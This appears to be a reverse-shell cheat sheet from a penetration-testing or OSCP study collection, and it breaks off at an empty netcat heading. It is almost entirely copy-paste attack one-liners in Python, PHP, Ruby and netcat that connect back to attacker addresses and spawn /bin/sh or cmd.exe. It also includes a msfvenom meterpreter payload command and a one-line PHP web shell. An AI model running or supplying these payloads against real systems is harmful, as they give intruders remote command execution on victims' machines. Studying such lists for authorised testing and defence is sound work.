python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.192",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.178.102",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.178.102",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.101",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.192",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["c:\\windows\\system32\\cmd.exe",""]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.192",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["c:\\windows\\system32\\cmd.exe",""]);'
* PHP reverse shell
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.178.102",5555);exec("/bin/sh -i <&3 >&3 2>&3");'
* PHP meterpreter reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.122.13 LPORT=443 -f raw > code.php
* php-reverseshell
cp /oscp/reverse_shells/php/php-reverse-shell-1.0/php-reverse-shell.php rev.php
* PHP simple shell Linux
<?php $cmd=$_GET[‘cmd’]; echo `$cmd`; ?>
* Ruby Reverse shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
* Ruby Reverse Shell target windows
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
* Netcat reverse Shell
nc -e /bin/sh 10.0.0.1 1234
* Netcat reverse Shell Bash
/bin/sh | nc attackerip 4444
/bin/sh -i | nc 192.168.178.102 9999
* Netcat reverse Shell without nc -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.0.192 5555 >f
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.178.102 9999 >f
mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.178.102 9999 >f
* Netcat Reverse Shell without bash